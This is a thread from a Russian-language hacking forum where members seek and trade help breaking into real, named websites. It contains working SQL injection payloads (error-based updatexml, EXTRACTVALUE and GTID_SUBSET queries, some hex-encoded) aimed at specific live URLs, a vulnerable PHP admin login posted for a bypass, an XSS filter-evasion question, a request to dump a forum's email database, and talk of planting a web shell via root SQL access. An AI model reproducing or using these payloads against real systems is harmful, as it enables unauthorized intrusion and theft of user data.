Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Спасибо капитан очевидность.
    Иди лучше дальше мёртвые сайты крути )
     
  2. Notrak

    Notrak New Member

    Joined:
    12 Apr 2018
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?
    (пишите в личку)
     
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    https://www.exploit-db.com
    https://0day.today
    Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло
     
  4. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Он мне писал, у меня просто нету времени крутить, там есть sql inject и WAF
     
  5. hn4sty

    hn4sty New Member

    Joined:
    21 Apr 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ребят, приветствую!

    Можно ли как нибудь заюзать XSS если фильтруются <> , то есть <img src="x"> = пустое место
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-
    Эх, никто таки сделал.Вопрос закрыт
     
  7. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    http://www.alphaonenow.org/searchresults.php
    В поиске 'and updatexml(NULL,concat(0x0a,(SELECT 1)),Null)--'
     
    Muracha and BabaDook like this.
  8. Alaich

    Alaich Member

    Joined:
    16 Oct 2015
    Messages:
    28
    Likes Received:
    13
    Reputations:
    7
    PHP:
    <?php
    @session_start();

        
    $conn mysql_connect(localhostroot1) or die("Cannot connect to the Host");
        
    mysql_select_db(123$conn) or die("Cannot connect to the Database");
        
        
    /*-------------------------For login-------------------------------------------------------*/
        
    if(isset($_REQUEST['logbtn_x']))
        {
            
    $AdminUserName=$_REQUEST['AdminUserName'];
            
    $AdminPassword=$_REQUEST['AdminPassword'];
            
            
    $sql_login="select * from admin where admin_username='".$AdminUserName."' and admin_password='".$AdminPassword."'";
            
    $res_login=mysql_query($sql_login) or mysql_error();
            
    $fetchinfo=mysql_fetch_array($res_login);
            
            
    $User_name=$fetchinfo['admin_username'];
            
    $User_password=$fetchinfo['admin_password'];
            
    $User_id=$fetchinfo['admin_id'];
            
            if(
    $User_name==$AdminUserName && $User_password==$AdminPassword)
                {
                    
    $_SESSION['AdminUserName']=$User_name;
                    
    $_SESSION['AdminId']=$User_id;
                    
    $_SESSION['AdminPrevilage']=$User_type;
                    
                    echo 
    "<script>window.location.href='home.php';</script>";
                }
            else
                {
                    
    $message="Invalid Username or password !";
                }   
        
        }
        
        
    /*-------------------------End of login----------------------------------------------------*/
    ?>

                                        <form name="loginbox" id="loginbox" method="post" action="" onsubmit="return logvalid()">
                                            <table width="100%" border="0" cellpadding="2" cellspacing="2" id="innertable" style="background-color:#FFFFFF">
                                                <tr>
                                                    <td colspan="2" align="left" class="Error"><?=$message?></td>
                                                </tr>
                                                
                                                <tr>
                                                    <td class="adminlogtext" align="left" style="font-size:14px">User&nbsp;Name</td>
                                                    <td align="right" style="padding-right:10px;"><input type="text" name="AdminUserName" id="AdminUserName" value="<?=$_REQUEST['AdminUserName']?>" class="textbox" style="width:150px"/></td>
                                                </tr>
                                                
                                                <tr>
                                                    <td class="adminlogtext" align="left" style="font-size:14px">Password</td>
                                                    <td align="right" style="padding-right:10px;"><input type="password" name="AdminPassword" id="AdminPassword" value="<?=$_REQUEST['AdminPassword']?>"  class="textboxpwd" style="width:150px"/></td>
                                                </tr>
                                                
                                                <tr>
                                                    <td>&nbsp;</td>
                                                    <td align="right" style="padding-right:10px;"><input type="image" src="images/login_button.png" name="logbtn" id="logbtn" title="login_button" style="border:0px;" /></td>
                                                </tr>
                                            </table>
                                        </form>
                                 
    Есть возможность обойти ?
     
  9. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    загугли sql injection
     
    Muracha likes this.
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Помогите пожалуйста:
    PHP:
    0x676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d33392b554e694f6e2b53654c4563542b312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c3236
     
  11. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    PHP:
    0x687474703a2f2f676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d312b414e442b4558545241435456414c55452832322c434f4e43415428307835632c2876657273696f6e28292929292b2d2d2b2d
     
    crlf and BabaDook like this.
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Спасибо братан
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Отправляй через POST. Там видимо $_REQUEST['news_id'].

    Code:
    http://www.alphaonenow.org/story.php
    POST: news_id = 4341 and GTID_SUBSET((SELECT database()),0)-- a
    
    Слово "select" хорошо фильтруется, но жаль, что фильтр работает только на GET-параметрах.
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  15. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    А через юнион селект не получиться? Я вроде подобрал ко-во полей.. Подумал может что-то можно сделать, было бы круто.
     
  17. rudu2

    rudu2 New Member

    Joined:
    16 Dec 2016
    Messages:
    45
    Likes Received:
    4
    Reputations:
    0
    Всем привет,такой вопрос,есть скуля с root правами,есть пути,винда сервер php,путаюсь лить шеел но выяснилось что стоит PDO есть умелци кто такое может обойти?
     
  18. Fenix8612

    Fenix8612 New Member

    Joined:
    17 Mar 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  19. qwaszx000

    qwaszx000 Member

    Joined:
    10 Feb 2018
    Messages:
    27
    Likes Received:
    14
    Reputations:
    7
    Это не sql inj вроде.
     
  20. rudu2

    rudu2 New Member

    Joined:
    16 Dec 2016
    Messages:
    45
    Likes Received:
    4
    Reputations:
    0
    http://www.lsrrealestate-m.ru/common/500/?errmessage=28.04.2018 18:10:52
    ASPCode=
    Source=
    Category=Microsoft VBScript runtime
    File=/template_offers.asp
    Line=35
    Column=-1
    Description=Type mismatch: '[string: "1433'"]'
    Column=
    ref=
    url=www.lsrrealestate-m.ru/offers/Default.asp?id=1433%27
    тут нет sqlini